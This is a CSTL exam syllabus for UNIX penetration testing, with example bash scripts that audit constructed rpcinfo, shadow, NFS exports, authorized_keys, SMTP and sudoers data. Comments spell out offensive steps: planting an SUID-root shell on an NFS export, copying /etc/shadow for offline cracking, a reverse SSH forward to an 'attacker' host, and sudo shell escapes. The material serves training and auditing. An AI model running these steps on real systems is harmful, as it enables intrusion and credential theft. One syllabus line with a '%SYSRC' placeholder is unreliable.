CSTL UNIX Security Knowledge

The following sections list the knowledge depth required for a successful pass of the CSTL exam.

You will be given a random selection of questions. Please note exam content is subject to change due to circumstances beyond our control – use this as a guide and email us if you have any queries.

  • Can identify Unix hosts on a target network.
  • Can demonstrate and explain the enumeration of data from a variety of common network services on various platforms, including:
    • Filesystems or resources shared remotely, such as NFS and SMB
    • SMTP
    • SSH
    • Telnet
    • SNMP
    • RID cycling
  • Is aware of legacy user enumeration techniques such as rusers and rwho.
  • Can enumerate RPC services and identify those with known security vulnerabilities.
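The RPC enumeration item above is usually worked from `rpcinfo -p <host>`. The script below is an added example, not part of the CSTL syllabus page: it summarises a constructed `rpcinfo -p` listing (not captured from a real host) into one line per program number, names the well-known numbers from the standard /etc/rpc assignments itself (rpcinfo only fills the service column for numbers the scanning host can resolve locally), and says which follow-up check each interesting program calls for. The sample listing and function names are this example's own.

```shell
#!/usr/bin/env bash
# Added example (not part of the CSTL syllabus page): summarise the output of
# "rpcinfo -p <host>" so each RPC program is listed once with its endpoints.
# The listing below is constructed for this example, not captured from a host.
# rpcinfo only fills the service column for numbers the *scanning* host can
# resolve via /etc/rpc, so the summary names the well-known numbers itself.

SAMPLE_RPCINFO='   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100005    1   udp  32769  mountd
    100005    3   tcp  32803  mountd
    100003    2   udp   2049  nfs
    100003    3   tcp   2049  nfs
    100024    1   udp  32770  status
    100021    1   udp  32771  nlockmgr
    100002    2   udp  32772
    100008    1   udp  32773'

# rpc_name PROGNUM -> well-known name (standard /etc/rpc assignment) or "unknown"
rpc_name() {
  case "$1" in
    100000) echo portmapper;;
    100001) echo rstatd;;
    100002) echo rusersd;;
    100003) echo nfs;;
    100004) echo ypserv;;
    100005) echo mountd;;
    100007) echo ypbind;;
    100008) echo walld;;
    100021) echo nlockmgr;;
    100024) echo status;;
    *)      echo unknown;;
  esac
}

# rpc_programs TEXT -> "prognum name proto:port[,proto:port...]", one line per
# distinct program number, in first-seen order.
rpc_programs() {
  printf '%s\n' "$1" | awk 'NR > 1 && NF >= 4 {
      prog = $1; ep = $3 ":" $4
      if (!(prog in eps)) { order[++n] = prog; eps[prog] = ep }
      else if (index("," eps[prog] ",", "," ep ",") == 0) { eps[prog] = eps[prog] "," ep }
    }
    END { for (i = 1; i <= n; i++) print order[i], eps[order[i]] }' |
  while read -r prog endpoints; do
    printf '%s %s %s\n' "$prog" "$(rpc_name "$prog")" "$endpoints"
  done
}

# rpc_followups TEXT -> the next enumeration step each interesting program calls for
rpc_followups() {
  rpc_programs "$1" | while read -r prog name _; do
    case "$name" in
      mountd|nfs)   echo "$name: list exports with showmount -e <host>";;
      rusersd)      echo "$name: legacy user enumeration with rusers -l <host>";;
      rstatd|walld) echo "$name: legacy info/messaging daemon, rarely needed; report it";;
    esac
  done
}

rpc_programs "$SAMPLE_RPCINFO"
rpc_followups "$SAMPLE_RPCINFO"
```

The program-number table only covers the numbers a UNIX test most often meets; extend it from the scanning host's own /etc/rpc when an unfamiliar number appears, rather than guessing what it serves.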

  • Understands users, groups and password policies, including complexity requirements and lock-out.
  • Understands how to avoid causing a denial of service by locking out accounts, e.g. by establishing the lock-out threshold before any password guessing.
  • Understands UNIX password hashing algorithms and their associated security attributes.
  • Understands how passwords are stored and protected and can demonstrate how they can be recovered.
  • Understands and can demonstrate off-line password cracking using dictionary and brute-force attacks.
  • Can demonstrate the recovery of password hashes when given physical access to a UNIX host.
  • Understands the format of the passwd, shadow, group and gshadow files.
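The password-storage items above come together in one procedure: read passwd and shadow, recognise the hashing algorithm from the `$id$` prefix, separate crackable entries from locked or empty ones, and feed the result to an offline cracker. The script below is an added example, not part of the CSTL syllabus page. Both files in it are constructed for the example and the hash bodies are placeholders, not real hashes of any password; the function names are this example's own.

```shell
#!/usr/bin/env bash
# Added example (not part of the CSTL syllabus page): read passwd/shadow data,
# classify each hash by its crypt(3) "$id$" prefix, and produce the
# "user:hash:uid:gid:gecos:home:shell" lines an offline cracker consumes.
# Both files below are constructed for this example; the hash bodies are
# placeholders, not real hashes of any password.

SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
legacy:x:1001:1001:Legacy App:/home/legacy:/bin/sh
alice:x:1002:1002:Alice:/home/alice:/bin/bash
bob:x:1003:1003:Bob:/home/bob:/bin/bash
svc:x:1004:1004:Service:/var/lib/svc:/bin/false'

# shadow fields: name:hash:lastchange:min:max:warn:inactive:expire:reserved
SAMPLE_SHADOW='root:$6$saltsalt$AAAA:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
legacy:$1$salt$BBBB:18000:0:99999:7:::
alice:$5$saltsalt$CCCC:19100:0:90:7:::
bob:!$6$saltsalt$DDDD:19100:0:99999:7:::
svc::19100:0:99999:7:::'

# hash_algo HASHFIELD -> algorithm implied by the prefix (or the account state)
hash_algo() {
  case "$1" in
    '')                      echo "empty (login without a password)";;
    '!'*|'*'*)               echo "locked";;
    '$1$'*)                  echo "md5crypt";;      # hashcat -m 500
    '$2a$'*|'$2b$'*|'$2y$'*) echo "bcrypt";;        # hashcat -m 3200
    '$5$'*)                  echo "sha256crypt";;   # hashcat -m 7400
    '$6$'*)                  echo "sha512crypt";;   # hashcat -m 1800
    '$y$'*)                  echo "yescrypt";;
    *)                       echo "descrypt or unrecognised";;  # 13-char traditional DES
  esac
}

# shadow_report SHADOW_TEXT -> "user algorithm max=<days>" per account
shadow_report() {
  printf '%s\n' "$1" | while IFS=: read -r user hash _last _min max _rest; do
    printf '%s %s max=%s\n' "$user" "$(hash_algo "$hash")" "$max"
  done
}

# passwordless_accounts SHADOW_TEXT -> accounts whose hash field is empty
passwordless_accounts() {
  printf '%s\n' "$1" | awk -F: '$2 == "" { print $1 }'
}

# unshadow_crackable PASSWD_TEXT SHADOW_TEXT -> passwd lines with the real hash
# in field 2 (what john's unshadow produces), skipping locked and empty entries
unshadow_crackable() {
  local passwd="$1" shadow="$2"
  printf '%s\n' "$shadow" | while IFS=: read -r user hash _; do
    case "$hash" in ''|'!'*|'*'*) continue;; esac
    printf '%s\n' "$passwd" | awk -F: -v u="$user" -v h="$hash" \
      '$1 == u { print $1 ":" h ":" $3 ":" $4 ":" $5 ":" $6 ":" $7 }'
  done
}

shadow_report "$SAMPLE_SHADOW"
passwordless_accounts "$SAMPLE_SHADOW"
unshadow_crackable "$SAMPLE_PASSWD" "$SAMPLE_SHADOW"
# On an engagement the last output goes to a file for offline cracking, e.g.
#   john --wordlist=words.txt hashes.txt     or     hashcat -m 1800 hashes.txt words.txt
```

With physical access the same inputs are obtained by booting the host from live media and copying /etc/shadow off the mounted root filesystem; the parsing and cracking steps are unchanged.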

  • Understands and can demonstrate local privilege escalation techniques, e.g. through the manipulation of insecure file system permissions.
  • Understands and can demonstrate the local exploitation of Solaris and Linux operating system vulnerabilities.

  • Understands and can demonstrate the remote exploitation of Solaris and Linux operating system vulnerabilities.
  • Understands and can demonstrate common post-exploitation activities, including:
    • Obtaining locally stored clear-text passwords
    • Password recovery (exfiltration and cracking)
    • Lateral movement
    • Checking OS and third party software application patch levels
    • Deriving a list of missing security patches
    • Reverting OS and software components to their previous state once testing is complete.

  • Understands FTP and can demonstrate how a poorly configured FTP server can be exploited, e.g. the downloading of arbitrary files, the uploading and over-writing of files, and the modification of file system permissions.
  • Understands the security implications of anonymous FTP access.
  • Understands TFTP and can demonstrate how a poorly configured TFTP server can be exploited, e.g. the downloading of arbitrary files and the uploading and over-writing of files.
  • Understands and can exploit TFTP within a Cisco environment.
  • Understands NFS and its associated security attributes and can demonstrate how exports can be identified.
  • Can demonstrate how a poorly configured NFS service can lead to the compromise of a server, allow a user to escalate privileges and/or gain further access to a host, e.g. through the creation of SUID-root files, the modification of files and file system permissions, and UID/GID manipulation.
  • Understands the concepts of root squashing and of the nosuid and noexec mount options.
  • Understands how NFS exports can be restricted at both a host and file level.
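The NFS items above are worked from two sides: the server's export list (what `showmount -e <host>` shows the attacker, and what /etc/exports defines) and the client-side mount options that blunt SUID and executable planting. The script below is an added example, not part of the CSTL syllabus page: it audits a constructed /etc/exports for world exports, `no_root_squash`, and `insecure`, and checks a constructed /proc/mounts listing for NFS mounts lacking `nosuid`/`noexec`. Neither input comes from a real host, and the function names are this example's own.

```shell
#!/usr/bin/env bash
# Added example (not part of the CSTL syllabus page): audit an /etc/exports
# file for the weaknesses the syllabus describes, and check client-side mount
# options for the nosuid/noexec protections. Both inputs are constructed for
# this example, not taken from a real host.
set -f   # no pathname expansion: export client specs contain "*"
#
# From the attacker side the exports are listed with "showmount -e <host>" and
# mounted with "mount -t nfs <host>:/export /mnt". Why the flags matter:
#   rw + no_root_squash : root on the client writes a root-owned SUID file
#                         (cp /bin/sh /mnt/sh; chmod 4755 /mnt/sh) that any
#                         user on the server can run as root, unless the
#                         server mounts the filesystem nosuid.
#   rw + root_squash    : root is mapped to nobody, but the attacker can still
#                         create a local user with the UID of any file owner on
#                         the export and modify that user's files (UID/GID
#                         manipulation), e.g. planting ~/.ssh/authorized_keys.
#   insecure            : requests from unprivileged source ports are accepted,
#                         so no root on the client is needed to talk to the server.

SAMPLE_EXPORTS='# constructed /etc/exports
/export/home   10.0.0.0/24(rw,sync,no_subtree_check)
/export/tools  *(rw,no_root_squash,sync)
/export/iso    *(ro,sync)
/srv/backup    backup01(rw,all_squash,anonuid=65534,anongid=65534)
/export/legacy 10.0.0.5(rw,insecure,no_root_squash) 10.0.0.6(ro)'

# export_findings EXPORTS_TEXT -> "path client finding" per weak export entry
export_findings() {
  printf '%s\n' "$1" | grep -Ev '^[[:space:]]*(#|$)' |
  while read -r path clients; do
    if [ -z "$clients" ]; then
      echo "$path * exported to every host (no client list)"
      continue
    fi
    for spec in $clients; do
      host="${spec%%\(*}"
      opts=""
      [ "$host" != "$spec" ] && { opts="${spec#*\(}"; opts="${opts%\)}"; }
      [ "$host" = "*" ] && echo "$path $host world-exported"
      case ",$opts," in
        *,no_root_squash,*)
          case ",$opts," in
            *,rw,*) echo "$path $host rw+no_root_squash: remote root can plant SUID-root files";;
            *)      echo "$path $host no_root_squash: remote root reads root-only files";;
          esac;;
      esac
      case ",$opts," in
        *,insecure,*) echo "$path $host insecure: unprivileged source ports accepted";;
      esac
    done
  done
}

SAMPLE_MOUNTS='fs01:/export/tools /mnt/tools nfs rw,relatime,vers=3,addr=10.0.0.2 0 0
fs01:/export/home /home nfs4 rw,nosuid,noexec,relatime 0 0
/dev/sda1 / ext4 rw,relatime 0 0'

# nfs_mount_gaps MOUNTS_TEXT (/proc/mounts format) -> NFS mounts lacking nosuid/noexec
nfs_mount_gaps() {
  printf '%s\n' "$1" | while read -r src mnt fstype opts _; do
    case "$fstype" in nfs|nfs4) ;; *) continue;; esac
    for want in nosuid noexec; do
      case ",$opts," in
        *",$want,"*) ;;
        *) echo "$mnt ($src) mounted without $want";;
      esac
    done
  done
}

export_findings "$SAMPLE_EXPORTS"
nfs_mount_gaps "$SAMPLE_MOUNTS"
```

Restricting an export is done per client in the host field (an address, network or hostname rather than `*`) and per tree by exporting only the subdirectory that needs sharing, with `root_squash` (the default) or `all_squash` left in force.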

  • Understands the Berkeley r-services and their associated security attributes and can demonstrate how trust relationships can:
    • lead to the compromise of a server
    • allow a user to escalate privileges and/or gain further access to a host, e.g. through the use, creation or modification of .rhosts and/or /etc/hosts.equiv files

  • Understands that SSH can be used for port forwarding and file transfer.
  • Understands SSH and its associated security attributes, including the different versions of the protocol, version fingerprinting and how the service can be used to provide a number of remote access services.
  • Can demonstrate how trust relationships can lead to the compromise of a server, allow a user to escalate privileges and/or gain further access to a host, e.g. through the use, creation or modification of ~/.ssh/authorized_keys files.
  • Can demonstrate forward and reverse port forwarding.
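Two of the SSH items above (version fingerprinting, and authorized_keys as a trust relationship) reduce to reading text the service hands you: the banner it sends on connect (readable with `nc <host> 22`) and the key file on a compromised host. The script below is an added example, not part of the CSTL syllabus page: it classifies banners by protocol version per the `SSH-protoversion-softwareversion` format of RFC 4253 and audits a constructed authorized_keys file for keys usable from anywhere, forced commands, and legacy DSA keys. The banner strings and key file are constructed for the example (the key material is a placeholder) and the function names are this example's own.

```shell
#!/usr/bin/env bash
# Added example (not part of the CSTL syllabus page): classify an SSH server
# banner by protocol version and audit an authorized_keys file for entries that
# grant trust without restriction. The banner strings and key file are
# constructed for this example; the key material is a placeholder.
#
# Port forwarding reminders (standard OpenSSH client options):
#   ssh -L 8080:intranet.host:80 user@pivot   # local: 127.0.0.1:8080 -> intranet.host:80 via pivot
#   ssh -R 2222:127.0.0.1:22 user@attacker    # reverse: attacker:2222 -> this host's sshd
#   ssh -D 1080 user@pivot                    # dynamic SOCKS proxy through pivot
#   scp / sftp                                # file transfer over the same service

# ssh_banner_class BANNER -> v1-only | v1-and-v2 | v2-only | not-ssh
# Per RFC 4253 s5.1 a server that also speaks the obsolete protocol 1
# announces "1.99"; protocol 1 support is itself a finding.
ssh_banner_class() {
  case "$1" in
    SSH-1.99-*) echo "v1-and-v2";;
    SSH-2.0-*)  echo "v2-only";;
    SSH-1.*)    echo "v1-only";;
    *)          echo "not-ssh";;
  esac
}

# ssh_software BANNER -> the softwareversion field (e.g. OpenSSH_8.9p1) without comments
ssh_software() {
  local rest="${1#SSH-*-}"
  printf '%s\n' "${rest%% *}"
}

SAMPLE_AUTHORIZED_KEYS='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQ...placeholder alice@laptop
from="10.0.0.5",no-port-forwarding,command="/usr/local/bin/backup" ssh-ed25519 AAAAC3NzaC1lZDI1NTE5...placeholder backup@bk01
ssh-dss AAAAB3NzaC1kc3MAAACBAN...placeholder legacy@oldhost
# comment line'

# authorized_keys_audit TEXT -> "keytype comment flags" per key
authorized_keys_audit() {
  printf '%s\n' "$1" | grep -Ev '^[[:space:]]*(#|$)' |
  while IFS= read -r line; do
    keytype=$(printf '%s\n' "$line" |
      grep -oE '(^| )(ssh-(rsa|dss|ed25519)|ecdsa-sha2-nistp[0-9]+|sk-[A-Za-z0-9@.-]+)( |$)' |
      head -n 1 | tr -d ' ')
    if [ -z "$keytype" ]; then echo "unparsed: $line"; continue; fi
    opts=""
    case "$line" in "$keytype "*) ;; *) opts="${line%% $keytype *}";; esac
    rest="${line#*$keytype }"            # "<base64> [comment]"
    comment="${rest#* }"; [ "$comment" = "$rest" ] && comment="-"
    flags="usable-from-anywhere"
    case "$opts" in *from=*) flags="from-restricted";; esac
    case "$opts" in *command=*) flags="$flags,forced-command";; esac
    case "$keytype" in ssh-dss) flags="$flags,dsa-legacy";; esac
    printf '%s %s %s\n' "$keytype" "$comment" "$flags"
  done
}

ssh_banner_class 'SSH-1.99-OpenSSH_3.9p1'
ssh_software 'SSH-2.0-OpenSSH_8.9p1 Ubuntu-3'
authorized_keys_audit "$SAMPLE_AUTHORIZED_KEYS"
```

An entry reported as usable-from-anywhere is the attacker's target when appending a key: a `from=` restriction or a forced command on every entry is the control that turns an authorized_keys write into something less than full interactive access.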

  • Understands X and its associated security attributes, and can demonstrate how insecure sessions can be exploited, e.g. by obtaining screen shots, capturing keystrokes and injecting commands into open terminals.
  • Can describe the differences between X and %SYSRC and the typical use cases within a test.
  • Understands and can demonstrate valid username discovery via EXPN and VRFY.
  • Is aware of recent sendmail vulnerabilities and can exploit them where possible.
  • Understands mail relaying.
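The VRFY/EXPN and mail-relaying items above are both answered by SMTP reply codes. The script below is an added example, not part of the CSTL syllabus page: it walks a constructed session (lines starting with `>` are what the tester typed over something like `nc <host> 25`, the rest are server replies) and turns each probe into a verdict. The transcript, host names and function names are this example's own.

```shell
#!/usr/bin/env bash
# Added example (not part of the CSTL syllabus page): interpret the replies an
# SMTP server gives to VRFY/EXPN user probes and to a relay test. The session
# below is constructed for this example; lines starting with ">" are what the
# tester typed, the rest are server replies.

SAMPLE_SESSION='220 mail.example.test ESMTP
>HELO tester.example.test
250 mail.example.test
>VRFY root
250 2.1.5 root <root@example.test>
>VRFY nosuchuser
550 5.1.1 nosuchuser... User unknown
>EXPN staff
252 2.5.2 Cannot VRFY user; try RCPT to attempt delivery
>MAIL FROM:<probe@attacker.test>
250 2.1.0 Sender ok
>RCPT TO:<victim@other-domain.test>
554 5.7.1 Relaying denied'

# smtp_user_verdict CODE -> what a VRFY/EXPN reply code says about the name.
# Always probe a name that cannot exist as well: a server that answers 250 or
# 252 to everything gives no information either way.
smtp_user_verdict() {
  case "$1" in
    250|251)     echo "valid";;
    550|551|553) echo "invalid";;
    252)         echo "unverifiable (server will not confirm; fall back to RCPT TO)";;
    500|502|503) echo "command disabled";;
    *)           echo "unexpected reply $1";;
  esac
}

# session_findings TRANSCRIPT -> one verdict per probe. The relay verdict is
# only meaningful when neither MAIL FROM nor RCPT TO is a local domain: a 250
# to such an RCPT means the server relays for third parties.
session_findings() {
  printf '%s\n' "$1" | awk '
    /^>/      { cmd = substr($0, 2); next }
    cmd != "" { print cmd "|" substr($1, 1, 3); cmd = "" }' |
  while IFS='|' read -r cmd code; do
    verb="${cmd%% *}"; arg="${cmd#* }"
    case "$verb" in
      VRFY|EXPN) echo "$verb $arg -> $(smtp_user_verdict "$code")";;
      RCPT) case "$code" in
              250|251) echo "$verb $arg accepted ($code) -> open relay";;
              *)       echo "$verb $arg refused ($code) -> relay denied";;
            esac;;
    esac
  done
}

session_findings "$SAMPLE_SESSION"
```

Only the first line of a multi-line reply is read, which is enough for the code; the enhanced status code that follows it (2.1.5, 5.1.1 and so on) is what the server's own MTA uses to distinguish the cases and is worth quoting in a report.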

  • Understands backported patches and their effect on scanning tools: a backported fix leaves the advertised version string unchanged, so version-based scanners report the package as vulnerable until the package changelog is checked.
  • Understands OS lifecycle management.
  • Understands enterprise patching strategies for Linux.
  • Understands patching in air-gapped environments.
  • Understands the security implications of installing software outside of the OS package manager.
  • Understands the purpose of using sudo rather than logging in as root.
  • Understands the difference between sudo and su.
  • Demonstrates the ability to exploit weak sudo configuration.
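Exploiting weak sudo configuration starts with reading what `sudo -l` reports and spotting rules that give more than intended. The script below is an added example, not part of the CSTL syllabus page: it parses a constructed sudoers fragment (not a real configuration) and flags unrestricted commands, NOPASSWD entries, wildcards in the command spec, and binaries that offer a shell escape or arbitrary file access when run as root. The fragment and function names are this example's own, and the list of shell-capable binaries is a starting set, not an exhaustive one.

```shell
#!/usr/bin/env bash
# Added example (not part of the CSTL syllabus page): audit sudoers rules for
# the weaknesses a tester looks for after "sudo -l": unrestricted commands,
# NOPASSWD entries, wildcards in the command spec, and binaries that can spawn
# a shell or read/write arbitrary files when run as root. The fragment below is
# constructed for this example; it is not a real configuration.

SAMPLE_SUDOERS='# constructed sudoers fragment
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
alice   ALL=(root) NOPASSWD: /usr/bin/vim
bob     ALL=(root) /usr/bin/find, /usr/bin/less
carol   ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
dave    ALL=(root) /usr/local/bin/backup.sh *
eve     ALL=(www-data) /usr/bin/tail -f /var/log/nginx/access.log'

# shell_capable PATH -> success if the program is known to offer a shell escape
# or arbitrary file access when run as root (vim ":!sh", less "!sh",
# find "-exec sh", awk "system()", tar "--checkpoint-action", and so on).
shell_capable() {
  case "${1##*/}" in
    vi|vim|view|less|more|man|find|awk|gawk|perl|python|python3|ruby|env|bash|sh|zsh|tar|nmap|docker) return 0;;
    *) return 1;;
  esac
}

# sudoers_findings TEXT -> "user runas=<who> cmd=<command> <flags>" per weak rule
sudoers_findings() {
  printf '%s\n' "$1" | grep -Ev '^[[:space:]]*(#|Defaults|$)' |
  while read -r who spec; do
    rhs="${spec#*=}"                                      # drop "hostlist="
    runas=$(printf '%s\n' "$rhs" | sed -n 's/^(\([^)]*\)).*/\1/p')
    rhs=$(printf '%s\n' "$rhs" | sed 's/^([^)]*) *//')   # drop "(runas) "
    tag=""
    case "$rhs" in NOPASSWD:*) tag="no-password"; rhs="${rhs#NOPASSWD:}";; esac
    printf '%s\n' "$rhs" | tr ',' '\n' | sed 's/^ *//; s/ *$//' |
    while read -r cmd; do
      flags="$tag"
      if [ "$cmd" = "ALL" ]; then flags="$flags,any-command"
      elif shell_capable "${cmd%% *}"; then flags="$flags,shell-escape"
      fi
      case "$cmd" in *\**) flags="$flags,wildcard-args";; esac
      flags="${flags#,}"
      if [ -n "$flags" ]; then
        printf '%s runas=%s cmd=%s %s\n' "$who" "${runas:-root}" "$cmd" "$flags"
      fi
    done
  done
}

sudoers_findings "$SAMPLE_SUDOERS"
```

The flags map directly onto the exploitation step: `shell-escape` means the permitted program itself drops to a root shell, `wildcard-args` means extra arguments (or a crafted filename) reach the command, and `any-command` needs no trick at all. This is also the practical difference from `su`: sudo can confine a user to one audited command, but only if the rule is written tightly enough that the command cannot be turned back into a shell.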